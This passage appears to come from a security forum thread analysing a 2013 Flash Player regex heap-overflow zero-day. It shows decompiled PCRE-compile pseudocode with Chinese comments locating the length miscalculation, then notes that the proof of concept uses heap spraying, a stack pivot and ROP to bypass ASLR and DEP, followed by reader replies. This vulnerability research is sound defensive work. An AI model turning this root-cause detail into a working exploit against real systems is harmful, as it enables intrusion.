  }
LABEL_31:
  v15 = a2;
  v16 = v15 & 0x700000;
  if ( v16 > (signed int)0x300000u )
  {
    if ( v16 != 0x400000 )
    {
      if ( v16 == 0x500000 )
      {
        v64 = 2;
        v17 = 0;
        goto LABEL_48;
      }
      goto LABEL_43;
    }
    v17 = 0;
    goto LABEL_46;
  }
  if ( v16 == 0x300000 )
  {
    v18 = '\r\n';
    v17 = 0;
    goto LABEL_37;
  }
  v17 = 0;
  if ( !v16 )
  {
LABEL_46:
    v64 = 1;
    goto LABEL_48;
  }
  if ( v16 != 0x100000 )
  {
    if ( v16 == 0x200000 )
    {
      v18 = 10;
      goto LABEL_37;
    }
LABEL_43:
    v10 = 0x38u;
    goto LABEL_74;
  }
  v18 = 13;
LABEL_37:
  v64 = v17;
  if ( v18 <= (signed int)0xFFu )
  {
    v65 = 1;
    v66 = v18;
  }
  else
  {
    v65 = 2;
    v66 = BYTE1(v18);
    v67 = v18;
  }
LABEL_48:
  v49 = (char *)&v68;
  v58 = v17;
  v59 = v17;
  v57 = v17;
  v55 = v17;
  v56 = v17;
  v54 = v17;
  v50 = (char *)&v68;
  v53 = (unsigned int)&v68;
  v51 = szRegExp;
  v19 = &szRegExp[a3a];
  a3a = (int)&v68;
  v61 = 0;
  v62 = 0;
  v52 = &szRegExp[strlen(szRegExp)];
  v60 = a2;
  v37 = v19;
  v68 = 0x5Du;
  sub_105297C0(a2, a2 & 7, &a3a, &v37, (int)&a5a, 0, 0, 0, (int)&a9, (int)&a10, 0, (int)&a12, (int)&a13);// 计算正则表达式的instanced memory长度
  v10 = a5a;
  if ( a5a )
    goto LABEL_74;
  v20 = a13;
  if ( a13 > (signed int)0x10000u )
  {
    v10 = 20;
    goto LABEL_74;
  }
  if ( (a2 & 7) != (v60 & 7) )
  {
    v20 = a13 + 2;                              // 0x5B+2=0x5D
    a13 += 2;
  }
  v21 = (void *)(v55 * (v56 + 3));              // v55=v56=0
  v22 = (int)((char *)v21 + v20 + 40);
  v23 = sub_105246E0(v21, (DWORD)((char *)v21 + v20 + 40));// v21=0,40+0x5D=0x85,分配正则表达式的instanced memory
  v24 = v23;
  if ( !v23 )
  {
    v10 = 21;
LABEL_73:
    v7 = v39;
    goto LABEL_74;
  }
  *((_DWORD *)v23 + 1) = v22;
  *(_DWORD *)v23 = 'PCRE';
  *((_DWORD *)v23 + 2) = v60;
  *((_WORD *)v23 + 10) = 0;
  *((_DWORD *)v23 + 3) = 0;
  *((_WORD *)v23 + 11) = 0;
  *((_WORD *)v23 + 12) = 40;
  *((_WORD *)v23 + 13) = v56;
  *((_WORD *)v23 + 14) = v55;
  *((_WORD *)v23 + 15) = 0;
  *((_DWORD *)v23 + 8) = v13 != (_DWORD)&unk_10B3EEC8 ? v13 : 0;
  *((_DWORD *)v23 + 9) = 0;
  v57 = 0;
  v55 = 0;
  v54 = (int)((char *)v23 + *((_WORD *)v23 + 12));
  v25 = *((_WORD *)v23 + 13) * *((_WORD *)v23 + 14);
  v53 = (unsigned int)&v68;
  v26 = v54 + v25;
  v50 = (char *)v26;
  v61 = 0;
  v62 = 0;
  v63 = 0;
  *(_BYTE *)v26 = ']';
  v27 = *((_DWORD *)v23 + 2) & 7;
  v28 = *((_DWORD *)v23 + 2);
  v37 = v19;
  a3a = v26;
  sub_105297C0(v28, v27, &a3a, &v37, (int)&a5a, 0, 0, 0, (int)&a9, (int)&a10, 0, (int)&a12, 0);// 填正则表达式的instanced memory
  *((_WORD *)v24 + 8) = v57;
  *((_WORD *)v24 + 9) = v58;
  if ( v62 )
    *((_DWORD *)v24 + 2) |= 0x80000000u;
  if ( v63 )
    a10 = -1;
  if ( !a5a && *v37 )
    a5a = 22;
  v29 = a3a;
  *(_BYTE *)a3a = 0;
  if ( v29 + 1 - v26 > a13 )
  {
    a5a = 23;
LABEL_72:
    sub_10524700(v24);
    v10 = a5a;
    goto LABEL_73;
  }
  if ( a5a )
    goto LABEL_72;
  while ( v53 > (unsigned int)&v68 )
  {
    v53 -= 2;
    a13 = *(_BYTE *)(v53 + 1) | (*(_BYTE *)v53 << 8);
    v30 = sub_10524F20();
    if ( !v30 )
    {
      a5a = 53;
      goto LABEL_72;
    }
    v31 = a13;
    *(_BYTE *)(a13 + v26) = (unsigned __int16)(v30 - (_WORD)v26) >> 8;
    *(_BYTE *)(v31 + v26 + 1) = v30 - v26;
    if ( a5a )
      goto LABEL_72;
  }
  if ( *((_WORD *)v24 + 9) > *((_WORD *)v24 + 8) )
  {
    a5a = 15;
    goto LABEL_72;
  }
  if ( !(*((_DWORD *)v24 + 2) & 0x10) )
  {
    v39 = (LPSTR)*((_DWORD *)v24 + 2);
    if ( sub_10529AF0(v26, 0, v59) )
    {
      *((_DWORD *)v24 + 2) |= 0x10u;
    }
    else
    {
      LOWORD(v32) = a9;
      if ( a9 < 0 && (v32 = sub_10529DF0(v26), v32 < 0) )
      {
        if ( sub_10529C80(v26, 0, v59) )
          *((_DWORD *)v24 + 2) |= 0x10000000u;
      }
      else
      {
        if ( v32 & 0x100 && *(_BYTE *)(v46 + (unsigned __int8)v32) == (unsigned __int8)v32 )
          LOWORD(v32) = (unsigned __int8)v32;
        *((_DWORD *)v24 + 2) |= 0x40000000u;
        *((_WORD *)v24 + 10) = v32;
      }
    }
  }
  v33 = a10;
  if ( a10 >= 0 )
  {
    v34 = *((_DWORD *)v24 + 2);
    if ( !(v34 & 0x10) || a10 & 0x200 )
    {
      if ( a10 & 0x100 && *(_BYTE *)(v46 + (unsigned __int8)a10) == (unsigned __int8)a10 )
        v33 = a10 & 0xFEFF;
      *((_WORD *)v24 + 11) = v33;
      *((_DWORD *)v24 + 2) = v34 | 0x20000000;
    }
  }
  return v24;
}

// a13!=NULL则计算长度,否则填正则表达式的instanced memory
signed int __cdecl sub_105297C0(char a1, int a2, int *a3, LPSTR *pszRegExp, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13)
{
  int v13; // ebx@1
  int v14; // esi@1
  int v15; // edi@1
  int v16; // eax@1
  int v17; // ecx@1
  int v18; // ebp@1
  int v19; // eax@1
  int v20; // esi@1
  char v21; // cl@4
  int v22; // eax@5
  int v23; // eax@7
  int v24; // eax@20
  int v25; // eax@27
  int v26; // ecx@28
  LPSTR v27; // edi@29
  int v28; // ecx@31
  int v29; // eax@32
  __int16 v30; // cx@32
  int v32; // esi@35
  int v33; // eax@35
  __int16 v34; // cx@36
  int v35; // esi@37
  char v36; // cl@39
  int v37; // edx@39
  char v38; // cl@39
  char v39; // dl@39
  int v40; // eax@39
  int v41; // eax@41
  int v42; // ecx@41
  int v43; // edx@43
  int v44; // [sp+10h] [bp-30h]@1
  LPSTR v45; // [sp+14h] [bp-2Ch]@1
  int a6a; // [sp+18h] [bp-28h]@8
  int v47; // [sp+1Ch] [bp-24h]@1
  int v48; // [sp+20h] [bp-20h]@1
  int v49; // [sp+24h] [bp-1Ch]@1
  int a2a; // [sp+28h] [bp-18h]@8
  int v51; // [sp+2Ch] [bp-14h]@1
  int v52; // [sp+30h] [bp-10h]@1
  int v53; // [sp+34h] [bp-Ch]@1
  int a7a; // [sp+38h] [bp-8h]@1
  int v55; // [sp+3Ch] [bp-4h]@1

  v13 = *a3;
  v45 = *pszRegExp;
  v48 = v13;
  v53 = v13;
  v51 = 0;
  sub_1050E300((int)v45);
  v14 = a13;
  v15 = a12;
  a7a = a11;
  v16 = a8;
  v44 = a8 + 6;
  v55 = v13;
  *(_BYTE *)(v13 + 1) = 0;
  *(_BYTE *)(v13 + 2) = 0;
  v17 = *(_DWORD *)(v15 + 48);
  v18 = -2;
  v19 = v13 + v16 + 3;
  v47 = -2;
  a11 = v19;
  v49 = v17;
  v52 = v17;
  v20 = v14 != 0 ? (int)&v44 : 0;
  while ( 1 )
  {
    if ( a7 )
      *(_DWORD *)(v15 + 48) = v52;
    v21 = a1;
    if ( (a1 & 7) != a2 )
    {
      *(_BYTE *)v19 = 0x18u;
      v22 = v19 + 1;
      *(_BYTE *)v22 = v21 & 7;                  // 又填了2字节的值
      v19 = v22 + 1;
      v44 += 2;
      a11 = v19;                                // 指针加2,'|'对应的长度只有3字节,但填了5字节的值
    }
    if ( a6 )
    {
      *(_BYTE *)v19 = 91;
      v23 = v19 + 1;
      *(_BYTE *)v23 = 0;
      *(_BYTE *)(v23 + 1) = 0;
      v51 = v23;
      v44 += 3;
      a11 = v23 + 2;
    }
    if ( !sub_10525D90(a5, (int)&a2a, (int)&a1, (int)&a11, (int)&v45, (int)&a6a, (int)&a7a, v15, v20) )// 存在递归
      goto LABEL_34;
    if ( *(_DWORD *)(v15 + 48) > v49 )
      v49 = *(_DWORD *)(v15 + 48);
    if ( a13 )
      goto LABEL_29;
    if ( *(_BYTE *)v13 != 0x53 )
    {
      v18 = a6a;
      v47 = a2a;
      goto LABEL_26;
    }
    if ( v47 >= 0 )
    {
      if ( v47 == a2a )
        goto LABEL_22;
      if ( v18 < 0 )
        v18 = v47;
      v47 = -1;
    }
    if ( a2a >= 0 )
    {
      v24 = a6a;
      if ( a6a < 0 )
      {
        v24 = a2a;
        a6a = a2a;
      }
      goto LABEL_23;
    }
LABEL_22:
    v24 = a6a;
LABEL_23:
    v18 = (v18 ^ v24) & 0xFFFFFDFF ? -1 : v24 | v18;
LABEL_26:
    if ( a6 )
    {
      *(_BYTE *)a11 = 0;
      v25 = sub_10529490(v13);
      if ( v25 < 0 )
      {
        *(_DWORD *)a5 = v25 != -2 ? 25 : 36;
LABEL_34:
        *pszRegExp = v45;
        return 0;
      }
      v26 = v51;
      v13 = v48;
      *(_BYTE *)v51 = BYTE1(v25);
      *(_BYTE *)(v26 + 1) = v25;
    }
LABEL_29:
    v27 = v45;
    if ( *v45 != ('|') )
      break;
    if ( a13 )
    {
      v28 = *a3;
      v44 += 3;                                 // 遇到'|'则长度加3,先前(?i)()()(?-i)部分计算出来的长度是0x18,有22个'|',长度加起来总共是0x5A
      v19 = v28 + a8 + 3;
      ++v45;
      v15 = a12;
      a11 = v28 + a8 + 3;
    }
    else
    {
      v29 = a11;
      v30 = a11 - v13;
      *(_BYTE *)a11 = 0x53u;
      *(_BYTE *)(v29 + 1) = HIBYTE(v30);
      *(_BYTE *)(v29 + 2) = v29 - v13;          // 遇到'|'则填了3字节的值
      v48 = v29;
      v13 = v29;
      v55 = v29;
      v19 = v29 + 3;
      v45 = v27 + 1;
      v15 = a12;
      a11 = v19;                                // 指针加3
    }
  }
  v32 = a13;
  v33 = a11;
  if ( !a13 )
  {
    v34 = a11 - v13;
    do
    {
      v35 = *(_BYTE *)(v13 + 2) | (*(_BYTE *)(v13 + 1) << 8);
      *(_BYTE *)(v13 + 2) = v34;
      *(_BYTE *)(v13 + 1) = HIBYTE(v34);
      v13 -= v35;
      v34 = v35;
    }
    while ( v35 > 0 );
    v32 = a13;
  }
  v36 = v53;
  v37 = (v33 - v53) >> 8;
  *(_BYTE *)v33 = 84;
  *(_BYTE *)(v33 + 1) = v37;
  LOBYTE(v37) = v33 - v36;
  v38 = a1;
  *(_BYTE *)(v33 + 2) = v37;
  v39 = a2;
  v40 = v33 + 3;
  if ( (v38 & 7) == a2 || *v27 != 41 )
  {
    v42 = v44;
  }
  else
  {
    *(_BYTE *)v40 = 24;
    v41 = v40 + 1;
    *(_BYTE *)v41 = v39;
    v40 = v41 + 1;
    v42 = v44 + 2;
  }
  *(_DWORD *)(a12 + 48) = v49;
  *a3 = v40;
  v43 = a9;
  *pszRegExp = v27;
  *(_DWORD *)v43 = v47;
  *(_DWORD *)a10 = v18;
  if ( v32 )
  {
    if ( 0x7FFFFFEB - *(_DWORD *)v32 < v42 )
    {
      *(_DWORD *)a5 = 20;
      return 0;
    }
    *(_DWORD *)v32 += v42;                      // 1+0x5A=0x5B
  }
  return 1;
}

4. 总结
这个POC利用硬编码、地址计算、堆喷射并配合stackpivot和ROP绕过ASLR+DEP,还是很复杂的,但是payload没有加密略显遗憾
5. 参考
http://www.adobe.com/support/security/bulletins/apsb13-04.html
http://bbs.kafan.cn/thread-1466244-1-1.html

[招生]科锐逆向工程师培训(3月6日远程教学班首开特惠, 第37期) !

上传的附件:
最新回复 (22)
xkjcf 2013-2-12 03:57
2
0
先收下~回头学习啦~
dEARMoON 2013-2-12 10:24
3
0
a2和v9可控导致任意地址QWORD写从而覆盖某对象的虚函数表指针

这句话真难找啊
promsied 4 2013-2-12 12:04
4
0
写的仓促了,更正了一下
我觉得这个漏洞应该归为Memory Corruption,所以应该是CVE-2013-0634
promsied 4 2013-2-13 12:56
5
0
Smashing the Heap with Vector:
Advanced Exploitation Technique in Recent Flash Zero-day Attack
Haifei Li大牛的Paper来啦
分析总算是完整啦
上传的附件:
darkplayer 2013-2-13 13:18
6
0
mark!!!!!!!!
wingdbg 2 2013-2-13 15:36
7
0
在office 2003和office 2007下不会成功么?
promsied 4 2013-2-13 15:56
8
0
和Office没有关系吧
wingdbg 2 2013-2-14 09:06
9
0
没触发成功,flash版本没有问题,office 2003 office 2007都没成功。。。
南宫世家 2013-2-14 09:41
10
0
好东东,学习。。。
AJISky 7 2013-2-15 21:45
11
0
顶下,最近也在看挖掘,请问是首发吗?
AJISky 7 2013-2-15 21:47
12
0
顶下,最近也在看这方面书,请问楼主是自己挖的吗?
寂寞如刀 1 2013-2-16 14:46
13
0
这个洞挖的太神了.

看来as的底裤要被扒下来了
pende 1 2013-2-18 11:20
14
0
分析得不错,学习学习
仙果 19 2013-2-18 16:39
15
0
都能够成功,你再仔细测试下
cscoder 5 2013-2-19 16:51
16
0
堆溢出,楼主溢出位置找的好像...好像不对:)

.text:105299B2                 mov     byte ptr [eax], 53h
cscoder 5 2013-2-19 16:51
17
0
如果仅分析漏洞原理,用Flex SDK编译附件生成SWF即可
上传的附件:
promsied 4 2013-2-19 17:21
18
0
[QUOTE=cscoder;1144280]堆溢出,楼主溢出位置找的好像...好像不对:)

.text:105299B2                 mov     byte ptr [eax], 53h[/QUOTE]

那是向Vector写Double的位置,正则表达式的部分我没分析,只是分析利用而已,有空再补上
promsied 4 2013-2-21 15:52
19
0
[QUOTE=cscoder;1144280]堆溢出,楼主溢出位置找的好像...好像不对:)

.text:105299B2                 mov     byte ptr [eax], 53h[/QUOTE]

补上了亲
king少 2013-2-25 17:28
20
0
没触发什么啊。。
范小贩 2013-3-13 10:29
21
0
看不懂分析文章,找不到shellcode在哪里啊
病武松 2013-3-14 09:27
22
0
求flash的环境
范小贩 2013-3-14 17:34
23
0
我的也没有成功,郁闷
游客
登录 | 注册 方可回帖
返回